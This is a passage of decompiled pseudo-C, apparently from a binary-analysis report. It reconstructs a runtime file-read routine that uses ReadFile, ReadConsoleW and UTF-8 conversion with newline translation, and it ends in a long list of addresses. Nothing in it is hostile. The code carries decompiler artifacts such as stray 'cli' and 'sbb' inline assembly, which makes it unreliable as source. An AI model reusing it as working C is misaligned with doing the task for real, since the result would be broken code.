					_t254 =  !__esi;
					__eflags = _t254 & 0x00000001;
					if((_t254 & 0x00000001) == 0) {
						goto L2;
					} else {
						_t421 = __esi >> 1;
						__eflags = _t421 - 4;
						if(_t421 < 4) {
							_t421 = 4;
						}
						_t259 = E00EB22C8(_t366, _t396, _t421);
						 *(_t432 - 0x10) = _t259;
						_pop(_t367);
						__eflags = _t259;
						if(__eflags != 0) {
							_t260 = E00EB3F56(_t367, __eflags,  *((intOrPtr*)(_t432 + 8)), 0, 0, 1);
							_t434 = _t434 + 0x10;
							_t369 =  *((intOrPtr*)(0xecf230 +  *(_t432 - 0xc) * 4));
							 *((intOrPtr*)(_t369 + _t362 + 0x28)) = _t260;
							_t17 = _t432 - 0x10; // 0xeb2b47
							_t261 =  *_t17;
							 *((intOrPtr*)(_t369 + _t362 + 0x2c)) = _t396;
							_t366 =  *(_t432 - 0xc);
							goto L14;
						} else {
							 *((intOrPtr*)(E00EAF100())) = 0xc;
							_t257 = E00EAF0CC();
							 *_t257 = 8;
							goto L161;
						}
					}
				} else {
					if(_t252 != 1) {
						L7:
						_t261 =  *(_t432 + 0xc);
						 *(_t432 - 0x10) = _t261;
						L14:
						_t397 =  *((intOrPtr*)(0xecf230 + _t366 * 4));
						_t370 =  *(_t432 - 0xc);
						 *(_t432 - 0x1c) = _t261;
						if(( *(_t397 + _t362 + 4) & 0x00000048) != 0) {
							_t405 =  *((intOrPtr*)(_t397 + _t362 + 5));
							if(_t405 != 0xa && _t421 != 0) {
								 *_t261 = _t405;
								_t406 = _t261 + 1;
								_t409 = 1;
								_t421 = _t421 - 1;
								 *(_t432 - 0x1c) = _t406;
								 *((char*)( *((intOrPtr*)(0xecf230 + _t370 * 4)) + _t362 + 5)) = 0xa;
								if( *(_t432 + 0x13) != 0) {
									_t353 =  *((intOrPtr*)( *((intOrPtr*)(0xecf230 + _t370 * 4)) + _t362 + 0x25));
									if(_t353 != 0xa && _t421 != 0) {
										 *_t406 = _t353;
										_t407 = _t406 + 1;
										_t421 = _t421 - 1;
										 *(_t432 - 0x1c) = _t407;
										_t409 = 2;
										 *((char*)( *((intOrPtr*)(0xecf230 + _t370 * 4)) + _t362 + 0x25)) = 0xa;
										if( *(_t432 + 0x13) == 1) {
											_t356 =  *((intOrPtr*)( *((intOrPtr*)(0xecf230 + _t370 * 4)) + _t362 + 0x26));
											if(_t356 != 0xa && _t421 != 0) {
												 *_t407 = _t356;
												_t421 = _t421 - 1;
												_t409 = 3;
												_t395 = 0xa;
												 *(_t432 - 0x1c) = _t407 + 1;
												 *((char*)( *((intOrPtr*)(0xecf230 + _t370 * 4)) + _t362 + 0x26)) = _t395;
											}
										}
									}
								}
							}
						}
						_t262 = E00EB3924( *((intOrPtr*)(_t432 + 8)));
						_t263 =  *(_t432 - 0xc);
						if(_t262 == 0) {
							L35:
							_t265 = ReadFile( *( *((intOrPtr*)(0xecf230 + _t263 * 4)) + _t362),  *(_t432 - 0x1c), _t421, _t432 - 0x14, 0); // executed
							__eflags = _t265;
							if(_t265 == 0) {
								L156:
								_t266 = GetLastError();
								_t423 = 5;
								__eflags = _t266 - _t423;
								if(_t266 != _t423) {
									__eflags = _t266 - 0x6d;
									if(_t266 != 0x6d) {
										goto L30;
									}
									_t364 = 0;
									goto L32;
								}
								 *((intOrPtr*)(E00EAF100())) = 9;
								 *(E00EAF0CC()) = _t423;
								goto L31;
							}
							_t375 =  *(_t432 - 0x14);
							__eflags = _t375;
							if(_t375 < 0) {
								goto L156;
							}
							__eflags = _t375 - _t421;
							if(_t375 > _t421) {
								goto L156;
							}
							goto L38;
						} else {
							_t394 =  *((intOrPtr*)(0xecf230 + _t263 * 4));
							if(( *(_t394 + _t362 + 4) & 0x00000080) == 0) {
								goto L35;
							}
							_t345 = GetConsoleMode( *(_t394 + _t362), _t432 - 0x20);
							 *(_t432 - 0x20) = _t345;
							if(_t345 == 0 ||  *(_t432 + 0x13) != 2) {
								_t263 =  *(_t432 - 0xc);
								goto L35;
							} else {
								if(ReadConsoleW( *( *((intOrPtr*)(0xecf230 +  *(_t432 - 0xc) * 4)) + _t362),  *(_t432 - 0x1c), _t421 >> 1, _t432 - 0x14, 0) != 0) {
									_t375 =  *(_t432 - 0x14) +  *(_t432 - 0x14);
									 *(_t432 - 0x14) = _t375;
									L38:
									_t398 =  *(_t432 - 0xc);
									_t409 = _t409 + _t375;
									_t424 =  *((intOrPtr*)(0xecf230 + _t398 * 4));
									_t272 =  *(_t424 + _t362 + 4);
									__eflags = _t272;
									if(_t272 >= 0) {
										L98:
										_t172 = _t432 - 0x10; // 0xeb2b47
										_t268 =  *_t172;
										L99:
										_t364 =  *(_t432 - 0x18);
										L100:
										if(_t268 !=  *(_t432 + 0xc)) {
											E00EB2248(_t268);
										}
										if(_t364 != 0xfffffffe) {
											_t409 = _t364;
										}
										_t258 = _t409;
										L162:
										return _t258;
									}
									__eflags =  *(_t432 + 0x13) - 2;
									if( *(_t432 + 0x13) == 2) {
										__eflags =  *(_t432 - 0x20);
										if( *(_t432 - 0x20) == 0) {
											__eflags = _t375;
											if(_t375 == 0) {
												L123:
												_t273 = _t272 & 0x000000fb;
												__eflags = _t273;
												L124:
												 *(_t424 + _t362 + 4) = _t273;
												_t194 = _t432 - 0x10; // 0xeb2b47
												_t274 =  *_t194;
												_t425 = _t274;
												 *(_t432 - 0x28) = _t274;
												_t376 = _t274 + _t409;
												 *(_t432 - 0x20) = _t376;
												__eflags = _t274 - _t376;
												if(_t274 >= _t376) {
													L155:
													_t246 = _t432 - 0x10; // 0xeb2b47
													_t268 =  *_t246;
													_t409 = _t425 - _t268;
													goto L99;
												}
												_t377 = 0xd;
												 *((intOrPtr*)(_t432 + 0x10)) = 0x1a;
												_t412 = _t274;
												while(1) {
													_t275 =  *_t412 & 0x0000ffff;
													__eflags = _t275 -  *((intOrPtr*)(_t432 + 0x10));
													if(_t275 ==  *((intOrPtr*)(_t432 + 0x10))) {
														break;
													}
													__eflags = _t275 - _t377;
													if(_t275 == _t377) {
														__eflags = _t412 -  *(_t432 - 0x20) + 0xfffffffe;
														if(_t412 >=  *(_t432 - 0x20) + 0xfffffffe) {
															_t412 =  &(_t412[1]);
															_t284 = ReadFile( *( *((intOrPtr*)(0xecf230 + _t398 * 4)) + _t362), _t432 - 8, 2, _t432 - 0x14, 0);
															__eflags = _t284;
															if(_t284 != 0) {
																L136:
																__eflags =  *(_t432 - 0x14);
																if( *(_t432 - 0x14) == 0) {
																	L151:
																	_t398 =  *(_t432 - 0xc);
																	_t377 = 0xd;
																	 *_t425 = _t377;
																	_t425 = _t425 + 2;
																	L143:
																	__eflags = _t412 -  *(_t432 - 0x20);
																	if(_t412 <  *(_t432 - 0x20)) {
																		continue;
																	}
																	goto L155;
																}
																_t398 =  *(_t432 - 0xc);
																_t285 =  *((intOrPtr*)(0xecf230 + _t398 * 4));
																__eflags =  *(_t285 + _t362 + 4) & 0x00000048;
																if(( *(_t285 + _t362 + 4) & 0x00000048) == 0) {
																	__eflags = _t425 -  *(_t432 - 0x10);
																	if(__eflags != 0) {
																		L148:
																		E00EB3F56(_t377, __eflags,  *((intOrPtr*)(_t432 + 8)), 0xfffffffe, 0xffffffff, 1);
																		_t398 =  *(_t432 - 0xc);
																		_t434 = _t434 + 0x10;
																		_t287 = 0xa;
																		__eflags =  *(_t432 - 8) - _t287;
																		if( *(_t432 - 8) == _t287) {
																			L141:
																			_push(0xd);
																			L142:
																			_pop(_t377);
																			goto L143;
																		}
																		_t377 = 0xd;
																		 *_t425 = _t377;
																		L150:
																		_t425 = _t425 + 2;
																		goto L143;
																	}
																	_t288 = 0xa;
																	__eflags =  *(_t432 - 8) - _t288;
																	if(__eflags != 0) {
																		goto L148;
																	}
																	 *_t425 = _t288;
																	_t425 = _t425 + 2;
																	goto L141;
																}
																_t289 = 0xa;
																_push(0xd);
																__eflags =  *(_t432 - 8) - _t289;
																if( *(_t432 - 8) != _t289) {
																	_pop(_t290);
																	 *_t425 = _t290;
																	_t425 = _t425 + 2;
																	__eflags = _t425;
																	 *((char*)( *((intOrPtr*)(0xecf230 + _t398 * 4)) + _t362 + 5)) =  *(_t432 - 8);
																	 *((char*)( *((intOrPtr*)(0xecf230 + _t398 * 4)) + _t362 + 0x25)) =  *((intOrPtr*)(_t432 - 7));
																	_t381 = 0xa;
																	 *((char*)( *((intOrPtr*)(0xecf230 + _t398 * 4)) + _t362 + 0x26)) = _t381;
																	goto L141;
																}
																 *_t425 = _t289;
																_t425 = _t425 + 2;
																goto L142;
															}
															_t294 = GetLastError();
															__eflags = _t294;
															if(_t294 != 0) {
																goto L151;
															}
															goto L136;
														}
														_t399 = 0xa;
														__eflags = _t412[1] - _t399;
														_t398 =  *(_t432 - 0xc);
														if(_t412[1] != _t399) {
															 *_t425 = _t377;
															L133:
															_t425 = _t425 + 2;
															_t412 =  &(_t412[1]);
															goto L143;
														}
														_t295 = 0xa;
														_t412 =  &(_t412[2]);
														 *_t425 = _t295;
														goto L150;
													}
													 *_t425 = _t275;
													goto L133;
												}
												_t378 =  *((intOrPtr*)(0xecf230 + _t398 * 4));
												_t276 =  *(_t378 + _t362 + 4);
												__eflags = _t276 & 0x00000040;
												if((_t276 & 0x00000040) != 0) {
													 *_t425 =  *_t412;
													_t425 = _t425 + 2;
													__eflags = _t425;
												} else {
													 *(_t378 + _t362 + 4) = _t276 | 0x00000002;
												}
												goto L155;
											}
											_t190 = _t432 - 0x10; // 0xeb2b47
											_t400 = 0xa;
											__eflags =  *((intOrPtr*)( *_t190)) - _t400;
											_t398 =  *(_t432 - 0xc);
											if( *((intOrPtr*)( *_t190)) != _t400) {
												goto L123;
											}
											_t273 = _t272 | 0x00000004;
											goto L124;
										}
										_t176 = _t432 - 0x10; // 0xeb2b47
										_t426 =  *_t176;
										asm("cdq");
										_t413 = _t426;
										_t383 = _t426;
										_t401 = _t413 + (_t409 - _t398 >> 1) * 2;
										__eflags = _t413 - _t401;
										asm("cli");
										if(__eflags >= 0) {
											L119:
											_t189 = _t432 - 0x10; // 0xeb2b47
											_t268 =  *_t189;
											_t409 = _t426 - _t268 & 0xfffffffe;
											goto L99;
										} else {
											 *((intOrPtr*)(_t432 + 0x10)) = 0x1a;
											_t416 = 0xd;
											while(1) {
												_t299 =  *_t383 & 0x0000ffff;
												__eflags = _t299 -  *((intOrPtr*)(_t432 + 0x10));
												if(_t299 ==  *((intOrPtr*)(_t432 + 0x10))) {
													break;
												}
												__eflags = _t299 - _t416;
												if(_t299 == _t416) {
													__eflags = _t383 - _t401 - 2;
													if(_t383 < _t401 - 2) {
														_t383 = _t383 + 2;
														_t303 = 0xa;
														__eflags =  *_t383 - _t303;
														if( *_t383 != _t303) {
															_t303 = 0xd;
															_t416 = _t303;
														}
														 *_t426 = _t303;
														_t426 = _t426 + 2;
														__eflags = _t426;
													}
												} else {
													 *_t426 = _t299;
													_t426 = _t426 + 2;
													_t383 = _t383 + 2;
												}
												__eflags = _t383 - _t401;
												if(_t383 < _t401) {
													continue;
												} else {
													goto L119;
												}
											}
											_t301 =  *((intOrPtr*)(0xecf230 +  *(_t432 - 0xc) * 4));
											_t185 = _t301 + _t362 + 4;
											 *_t185 =  *(_t301 + _t362 + 4) | 0x00000002;
											__eflags =  *_t185;
											goto L119;
										}
									}
									__eflags = _t375;
									if(_t375 == 0) {
										L43:
										_t304 = _t272 & 0x000000fb;
										__eflags = _t304;
										L44:
										 *(_t424 + _t362 + 4) = _t304;
										_t95 = _t432 - 0x10; // 0xeb2b47
										_t305 =  *_t95;
										_t427 = _t305;
										 *(_t432 - 0x20) = _t305;
										_t384 = _t305 + _t409;
										 *(_t432 - 0x1c) = _t384;
										__eflags = _t305 - _t384;
										if(_t305 >= _t384) {
											L74:
											_t135 = _t432 - 0x10; // 0xeb2b47
											_t268 =  *_t135;
											_t409 = _t427 - _t268;
											__eflags =  *(_t432 + 0x13) - 1;
											if( *(_t432 + 0x13) != 1) {
												goto L99;
											}
											__eflags = _t409;
											if(_t409 == 0) {
												goto L99;
											}
											_t428 = _t427 - 1;
											_t306 =  *_t428;
											__eflags = _t306;
											if(_t306 < 0) {
												_t307 = _t306 & 0x000000ff;
												_t403 = 1;
												__eflags =  *((char*)(_t307 + 0xece408));
												if( *((char*)(_t307 + 0xece408)) != 0) {
													L84:
													_t309 =  *((char*)(( *_t428 & 0x000000ff) + 0xece408));
													__eflags = _t309;
													if(_t309 != 0) {
														__eflags = _t309 + 1 - _t403;
														if(_t309 + 1 != _t403) {
															_t385 =  *((intOrPtr*)(0xecf230 +  *(_t432 - 0xc) * 4));
															__eflags =  *(_t385 + _t362 + 4) & 0x00000048;
															if(__eflags == 0) {
																asm("cdq");
																E00EB3F56(_t385, __eflags,  *((intOrPtr*)(_t432 + 8)),  ~_t403,  ~_t403, 1);
																_t434 = _t434 + 0x10;
															} else {
																_t430 =  &(_t428[1]);
																 *((char*)(_t385 + _t362 + 5)) =  *_t428;
																_t320 =  *(_t432 - 0xc);
																__eflags = _t403 - 2;
																if(_t403 >= 2) {
																	_t322 =  *_t430;
																	_t430 = _t430 + 1;
																	__eflags = _t430;
																	 *((char*)( *((intOrPtr*)(0xecf230 + _t320 * 4)) + _t362 + 0x25)) = _t322;
																	_t320 =  *(_t432 - 0xc);
																}
																__eflags = _t403 - 3;
																if(_t403 == 3) {
																	_t321 =  *_t430;
																	_t430 = _t430 + 1;
																	__eflags = _t430;
																	 *((char*)( *((intOrPtr*)(0xecf230 + _t320 * 4)) + _t362 + 0x26)) = _t321;
																}
																_t428 = _t430 - _t403;
															}
														} else {
															_t428 =  &(_t428[_t403]);
														}
														L95:
														_t163 = _t432 - 0x10; // 0xeb2b47
														_t418 =  *_t163;
														_t429 = _t428 - _t418;
														_t409 = MultiByteToWideChar(0xfde9, 0, _t418, _t429,  *(_t432 + 0xc),  *(_t432 - 0x28) >> 1);
														__eflags = _t409;
														if(_t409 == 0) {
															goto L29;
														}
														__eflags = _t409 - _t429;
														_t387 = 0 | _t409 != _t429;
														_t409 = _t409 + _t409;
														__eflags = _t409;
														 *( *((intOrPtr*)(0xecf230 +  *(_t432 - 0xc) * 4)) + _t362 + 0x30) = _t387;
														asm("sbb [eax], dh");
														goto L98;
													}
													 *((intOrPtr*)(E00EAF100())) = 0x2a;
													L31:
													_t364 = _t362 | 0xffffffff;
													L32:
													_t75 = _t432 - 0x10; // 0xeb2b47
													_t268 =  *_t75;
													goto L100;
												}
												_t138 = _t432 - 0x10; // 0xeb2b47
												_t365 =  *_t138;
												while(1) {
													__eflags = _t403 - 4;
													if(_t403 > 4) {
														break;
													}
													__eflags = _t428 - _t365;
													if(_t428 < _t365) {
														break;
													}
													_t428 = _t428 - 1;
													_t403 = _t403 + 1;
													_t324 =  *_t428 & 0x000000ff;
													__eflags =  *((char*)(_t324 + 0xece408));
													if( *((char*)(_t324 + 0xece408)) == 0) {
														continue;
													}
													break;
												}
												_t362 =  *(_t432 - 0x24);
												goto L84;
											}
											_t428 =  &(_t428[1]);
											goto L95;
										}
										_t390 = 0xd;
										_t419 = _t305;
										while(1) {
											_t325 =  *_t419;
											__eflags = _t325 - 0x1a;
											if(_t325 == 0x1a) {
												break;
											}
											__eflags = _t325 - _t390;
											if(_t325 == _t390) {
												__eflags = _t419 -  *(_t432 - 0x1c) - 1;
												if(_t419 >=  *(_t432 - 0x1c) - 1) {
													_t419 = _t419 + 1;
													_t334 = ReadFile( *( *((intOrPtr*)(0xecf230 + _t398 * 4)) + _t362), _t432 - 1, 1, _t432 - 0x14, 0);
													__eflags = _t334;
													if(_t334 != 0) {
														L55:
														__eflags =  *(_t432 - 0x14);
														if( *(_t432 - 0x14) == 0) {
															L70:
															_t398 =  *(_t432 - 0xc);
															_t390 = 0xd;
															 *_t427 = _t390;
															_t427 = _t427 + 1;
															L65:
															__eflags = _t419 -  *(_t432 - 0x1c);
															if(_t419 <  *(_t432 - 0x1c)) {
																continue;
															}
															goto L74;
														}
														_t398 =  *(_t432 - 0xc);
														_t335 =  *((intOrPtr*)(0xecf230 + _t398 * 4));
														__eflags =  *(_t335 + _t362 + 4) & 0x00000048;
														if(( *(_t335 + _t362 + 4) & 0x00000048) == 0) {
															_t120 = _t432 - 0x10; // 0xeb2b47
															__eflags = _t427 -  *_t120;
															if(__eflags != 0) {
																L67:
																E00EB3F56(_t390, __eflags,  *((intOrPtr*)(_t432 + 8)), 0xffffffff, 0xffffffff, 1);
																_t398 =  *(_t432 - 0xc);
																_t434 = _t434 + 0x10;
																_t337 = 0xa;
																__eflags =  *(_t432 - 1) - _t337;
																if( *(_t432 - 1) == _t337) {
																	L63:
																	_push(0xd);
																	L64:
																	_pop(_t390);
																	goto L65;
																}
																_t390 = 0xd;
																 *_t427 = _t390;
																L69:
																_t427 = _t427 + 1;
																goto L65;
															}
															_t338 = 0xa;
															__eflags =  *(_t432 - 1) - _t338;
															if(__eflags != 0) {
																goto L67;
															}
															 *_t427 = _t338;
															_t427 = _t427 + 1;
															__eflags = _t427;
															goto L63;
														}
														_t339 = 0xa;
														_push(0xd);
														__eflags =  *(_t432 - 1) - _t339;
														if( *(_t432 - 1) != _t339) {
															 *_t427 = 0xd;
															_t427 = _t427 + 1;
															 *((char*)( *((intOrPtr*)(0xecf230 + _t398 * 4)) + _t362 + 5)) =  *(_t432 - 1);
														} else {
															 *_t427 = _t339;
															_t427 = _t427 + 1;
														}
														goto L64;
													}
													_t341 = GetLastError();
													__eflags = _t341;
													if(_t341 != 0) {
														goto L70;
													}
													goto L55;
												}
												_t342 = _t419 + 1;
												__eflags =  *_t342 - 0xa;
												if( *_t342 != 0xa) {
													 *_t427 = _t390;
													_t419 = _t342;
													_t427 = _t427 + 1;
													goto L65;
												}
												_t343 = 0xa;
												_t419 = _t419 + 2;
												 *_t427 = _t343;
												goto L69;
											}
											 *_t427 = _t325;
											_t427 = _t427 + 1;
											_t419 = _t419 + 1;
											goto L65;
										}
										_t391 =  *((intOrPtr*)(0xecf230 + _t398 * 4));
										_t326 =  *(_t391 + _t362 + 4);
										__eflags = _t326 & 0x00000040;
										if((_t326 & 0x00000040) != 0) {
											 *_t427 =  *_t419;
											_t427 = _t427 + 1;
											__eflags = _t427;
										} else {
											 *(_t391 + _t362 + 4) = _t326 | 0x00000002;
										}
										goto L74;
									}
									_t92 = _t432 - 0x10; // 0xeb2b47
									__eflags =  *((char*)( *_t92)) - 0xa;
									if( *((char*)( *_t92)) != 0xa) {
										goto L43;
									}
									_t304 = _t272 | 0x00000004;
									goto L44;
								}
								L29:
								_t266 = GetLastError();
								L30:
								E00EAF0DF(_t266);
								goto L31;
							}
						}
					}
					if(( !__esi & 0x00000001) == 0) {
						L2:
						 *(E00EAF0CC()) =  *_t255 & _t409;
						 *((intOrPtr*)(E00EAF100())) = 0x16;
						_t257 = E00EAEB1E();
						L161:
						_t258 = _t257 | 0xffffffff;
						__eflags = _t258;
						goto L162;
					} else {
						_t421 = __esi & 0xfffffffe;
						goto L7;
					}
				}
			}




































































































                0x00ea289a
                0x00ea289a
                0x00ea289a
                0x00ea289a
                0x00eaf8ff
                0x00eaf901
                0x00eaf907
                0x00eaf908
                0x00eaf922
                0x00eaf924
                0x00eaf926
                0x00000000
                0x00eaf928
                0x00eaf928
                0x00eaf92a
                0x00eaf92d
                0x00eaf931
                0x00eaf931
                0x00eaf933
                0x00eaf938
                0x00eaf93b
                0x00eaf93c
                0x00eaf93e
                0x00eaf964
                0x00eaf96c
                0x00eaf96f
                0x00eaf976
                0x00eaf97a
                0x00eaf97a
                0x00eaf97d
                0x00eaf981
                0x00000000
                0x00eaf940
                0x00eaf945
                0x00eaf94b
                0x00eaf950
                0x00000000
                0x00eaf950
                0x00eaf93e
                0x00eaf90a
                0x00eaf90b
                0x00eaf918
                0x00eaf918
                0x00eaf91b
                0x00eaf984
                0x00eaf984
                0x00eaf98b
                0x00eaf98e
                0x00eaf996
                0x00eaf99c
                0x00eaf9a3
                0x00eaf9a9
                0x00eaf9ad
                0x00eaf9b0
                0x00eaf9b8
                0x00eaf9bd
                0x00eaf9c0
                0x00eaf9c5
                0x00eaf9ce
                0x00eaf9d4
                0x00eaf9da
                0x00eaf9dc
                0x00eaf9e4
                0x00eaf9eb
                0x00eaf9ee
                0x00eaf9ef
                0x00eaf9f4
                0x00eaf9fd
                0x00eafa03
                0x00eafa0b
                0x00eafa15
                0x00eafa16
                0x00eafa19
                0x00eafa1a
                0x00eafa1d
                0x00eafa1d
                0x00eafa03
                0x00eaf9f4
                0x00eaf9d4
                0x00eaf9c5
                0x00eaf9a3
                0x00eafa24
                0x00eafa2b
                0x00eafa2f
                0x00eafaa2
                0x00eafab6
                0x00eafabc
                0x00eafabe
                0x00eaff82
                0x00eaff82
                0x00eaff8a
                0x00eaff8b
                0x00eaff8d
                0x00eaffa6
                0x00eaffa9
                0x00000000
                0x00000000
                0x00eaffaf
                0x00000000
                0x00eaffaf
                0x00eaff94
                0x00eaff9f
                0x00000000
                0x00eaff9f
                0x00eafac4
                0x00eafac7
                0x00eafac9
                0x00000000
                0x00000000
                0x00eafacf
                0x00eafad1
                0x00000000
                0x00000000
                0x00000000
                0x00eafa31
                0x00eafa31
                0x00eafa3d
                0x00000000
                0x00000000
                0x00eafa46
                0x00eafa4c
                0x00eafa51
                0x00eafa9f
                0x00000000
                0x00eafa59
                0x00eafa7a
                0x00eafa97
                0x00eafa9a
                0x00eafad7
                0x00eafad7
                0x00eafada
                0x00eafadc
                0x00eafae3
                0x00eafae7
                0x00eafae9
                0x00eafd46
                0x00eafd46
                0x00eafd46
                0x00eafd49
                0x00eafd49
                0x00eafd4c
                0x00eafd4f
                0x00eafd52
                0x00eafd57
                0x00eafd5b
                0x00eafd5d
                0x00eafd5d
                0x00eafd5f
                0x00eaffd4
                0x00eaffda
                0x00eaffda
                0x00eafaef
                0x00eafaf3
                0x00eafd66
                0x00eafd6a
                0x00eafde5
                0x00eafde7
                0x00eafdfb
                0x00eafdfb
                0x00eafdfb
                0x00eafdfd
                0x00eafdfd
                0x00eafe01
                0x00eafe01
                0x00eafe04
                0x00eafe06
                0x00eafe09
                0x00eafe0c
                0x00eafe0f
                0x00eafe11
                0x00eaff76
                0x00eaff76
                0x00eaff76
                0x00eaff7b
                0x00000000
                0x00eaff7b
                0x00eafe19
                0x00eafe1a
                0x00eafe21
                0x00eafe23
                0x00eafe23
                0x00eafe26
                0x00eafe2a
                0x00000000
                0x00000000
                0x00eafe30
                0x00eafe33
                0x00eafe40
                0x00eafe42
                0x00eafe71
                0x00eafe85
                0x00eafe8b
                0x00eafe8d
                0x00eafe9d
                0x00eafe9d
                0x00eafea1
                0x00eaff48
                0x00eaff48
                0x00eaff4d
                0x00eaff4e
                0x00eaff51
                0x00eafeff
                0x00eafeff
                0x00eaff02
                0x00000000
                0x00000000
                0x00000000
                0x00eaff08
                0x00eafea7
                0x00eafeaa
                0x00eafeb1
                0x00eafeb6
                0x00eaff0a
                0x00eaff0d
                0x00eaff20
                0x00eaff29
                0x00eaff2e
                0x00eaff31
                0x00eaff36
                0x00eaff37
                0x00eaff3b
                0x00eafefc
                0x00eafefc
                0x00eafefe
                0x00eafefe
                0x00000000
                0x00eafefe
                0x00eaff3f
                0x00eaff40
                0x00eaff43
                0x00eaff43
                0x00000000
                0x00eaff43
                0x00eaff11
                0x00eaff12
                0x00eaff16
                0x00000000
                0x00000000
                0x00eaff18
                0x00eaff1b
                0x00000000
                0x00eaff1b
                0x00eafeba
                0x00eafebb
                0x00eafebd
                0x00eafec1
                0x00eafecb
                0x00eafecc
                0x00eafecf
                0x00eafecf
                0x00eafede
                0x00eafeec
                0x00eafef7
                0x00eafef8
                0x00000000
                0x00eafef8
                0x00eafec3
                0x00eafec6
                0x00000000
                0x00eafec6
                0x00eafe8f
                0x00eafe95
                0x00eafe97
                0x00000000
                0x00000000
                0x00000000
                0x00eafe97
                0x00eafe46
                0x00eafe47
                0x00eafe4b
                0x00eafe4e
                0x00eafe5e
                0x00eafe61
                0x00eafe61
                0x00eafe64
                0x00000000
                0x00eafe64
                0x00eafe52
                0x00eafe53
                0x00eafe56
                0x00000000
                0x00eafe56
                0x00eafe35
                0x00000000
                0x00eafe35
                0x00eaff56
                0x00eaff5d
                0x00eaff61
                0x00eaff63
                0x00eaff70
                0x00eaff73
                0x00eaff73
                0x00eaff65
                0x00eaff67
                0x00eaff67
                0x00000000
                0x00eaff63
                0x00eafde9
                0x00eafdee
                0x00eafdef
                0x00eafdf2
                0x00eafdf5
                0x00000000
                0x00000000
                0x00eafdf7
                0x00000000
                0x00eafdf7
                0x00eafd6c
                0x00eafd6c
                0x00eafd71
                0x00eafd72
                0x00eafd76
                0x00eafd7a
                0x00eafd7d
                0x00eafd7e
                0x00eafd7f
                0x00eafdd6
                0x00eafdd6
                0x00eafdd6
                0x00eafddd
                0x00000000
                0x00eafd81
                0x00eafd83
                0x00eafd8a
                0x00eafd8b
                0x00eafd8b
                0x00eafd8e
                0x00eafd92
                0x00000000
                0x00000000
                0x00eafd94
                0x00eafd97
                0x00eafda7
                0x00eafda9
                0x00eafdab
                0x00eafdb0
                0x00eafdb1
                0x00eafdb4
                0x00eafdb8
                0x00eafdba
                0x00eafdba
                0x00eafdbb
                0x00eafdbe
                0x00eafdbe
                0x00eafdbe
                0x00eafd99
                0x00eafd99
                0x00eafd9c
                0x00eafd9f
                0x00eafd9f
                0x00eafdc1
                0x00eafdc3
                0x00000000
                0x00eafdc5
                0x00000000
                0x00eafdc5
                0x00eafdc3
                0x00eafdca
                0x00eafdd1
                0x00eafdd1
                0x00eafdd1
                0x00000000
                0x00eafdd1
                0x00eafd7f
                0x00eafaf9
                0x00eafafb
                0x00eafb09
                0x00eafb09
                0x00eafb09
                0x00eafb0b
                0x00eafb0b
                0x00eafb0f
                0x00eafb0f
                0x00eafb12
                0x00eafb14
                0x00eafb17
                0x00eafb1a
                0x00eafb1d
                0x00eafb1f
                0x00eafc33
                0x00eafc33
                0x00eafc33
                0x00eafc38
                0x00eafc3a
                0x00eafc3e
                0x00000000
                0x00000000
                0x00eafc44
                0x00eafc46
                0x00000000
                0x00000000
                0x00eafc4c
                0x00eafc4d
                0x00eafc4f
                0x00eafc51
                0x00eafc59
                0x00eafc5e
                0x00eafc5f
                0x00eafc66
                0x00eafc85
                0x00eafc88
                0x00eafc8f
                0x00eafc91
                0x00eafca4
                0x00eafca6
                0x00eafcaf
                0x00eafcb6
                0x00eafcbb
                0x00eafcfa
                0x00eafd00
                0x00eafd05
                0x00eafcbd
                0x00eafcbf
                0x00eafcc0
                0x00eafcc4
                0x00eafcc7
                0x00eafcca
                0x00eafcd3
                0x00eafcd5
                0x00eafcd5
                0x00eafcd6
                0x00eafcda
                0x00eafcda
                0x00eafcdd
                0x00eafce0
                0x00eafce9
                0x00eafceb
                0x00eafceb
                0x00eafcec
                0x00eafcec
                0x00eafcf0
                0x00eafcf0
                0x00eafca8
                0x00eafca8
                0x00eafca8
                0x00eafd08
                0x00eafd0b
                0x00eafd0b
                0x00eafd0e
                0x00eafd25
                0x00eafd27
                0x00eafd29
                0x00000000
                0x00000000
                0x00eafd34
                0x00eafd36
                0x00eafd39
                0x00eafd39
                0x00eafd42
                0x00eafd44
                0x00000000
                0x00eafd44
                0x00eafc98
                0x00eafa89
                0x00eafa89
                0x00eafa8c
                0x00eafa8c
                0x00eafa8c
                0x00000000
                0x00eafa8c
                0x00eafc68
                0x00eafc68
                0x00eafc6b
                0x00eafc6b
                0x00eafc6e
                0x00000000
                0x00000000
                0x00eafc70
                0x00eafc72
                0x00000000
                0x00000000
                0x00eafc74
                0x00eafc75
                0x00eafc76
                0x00eafc79
                0x00eafc80
                0x00000000
                0x00000000
                0x00000000
                0x00eafc80
                0x00eafc82
                0x00000000
                0x00eafc82
                0x00eafc53
                0x00000000
                0x00eafc53
                0x00eafb27
                0x00eafb28
                0x00eafb2a
                0x00eafb2a
                0x00eafb2c
                0x00eafb2e
                0x00000000
                0x00000000
                0x00eafb34
                0x00eafb36
                0x00eafb45
                0x00eafb47
                0x00eafb6a
                0x00eafb7c
                0x00eafb82
                0x00eafb84
                0x00eafb90
                0x00eafb90
                0x00eafb94
                0x00eafc0c
                0x00eafc0c
                0x00eafc11
                0x00eafc12
                0x00eafc14
                0x00eafbdd
                0x00eafbdd
                0x00eafbe0
                0x00000000
                0x00000000
                0x00000000
                0x00eafbe6
                0x00eafb96
                0x00eafb99
                0x00eafba0
                0x00eafba5
                0x00eafbca
                0x00eafbca
                0x00eafbcd
                0x00eafbe8
                0x00eafbf1
                0x00eafbf6
                0x00eafbf9
                0x00eafbfe
                0x00eafbff
                0x00eafc02
                0x00eafbda
                0x00eafbda
                0x00eafbdc
                0x00eafbdc
                0x00000000
                0x00eafbdc
                0x00eafc06
                0x00eafc07
                0x00eafc09
                0x00eafc09
                0x00000000
                0x00eafc09
                0x00eafbd1
                0x00eafbd2
                0x00eafbd5
                0x00000000
                0x00000000
                0x00eafbd7
                0x00eafbd9
                0x00eafbd9
                0x00000000
                0x00eafbd9
                0x00eafba9
                0x00eafbaa
                0x00eafbac
                0x00eafbaf
                0x00eafbb6
                0x00eafbb9
                0x00eafbc4
                0x00eafbb1
                0x00eafbb1
                0x00eafbb3
                0x00eafbb3
                0x00000000
                0x00eafbaf
                0x00eafb86
                0x00eafb8c
                0x00eafb8e
                0x00000000
                0x00000000
                0x00000000
                0x00eafb8e
                0x00eafb49
                0x00eafb4c
                0x00eafb4f
                0x00eafb5e
                0x00eafb60
                0x00eafb62
                0x00000000
                0x00eafb62
                0x00eafb53
                0x00eafb54
                0x00eafb57
                0x00000000
                0x00eafb57
                0x00eafb38
                0x00eafb3a
                0x00eafb3b
                0x00000000
                0x00eafb3b
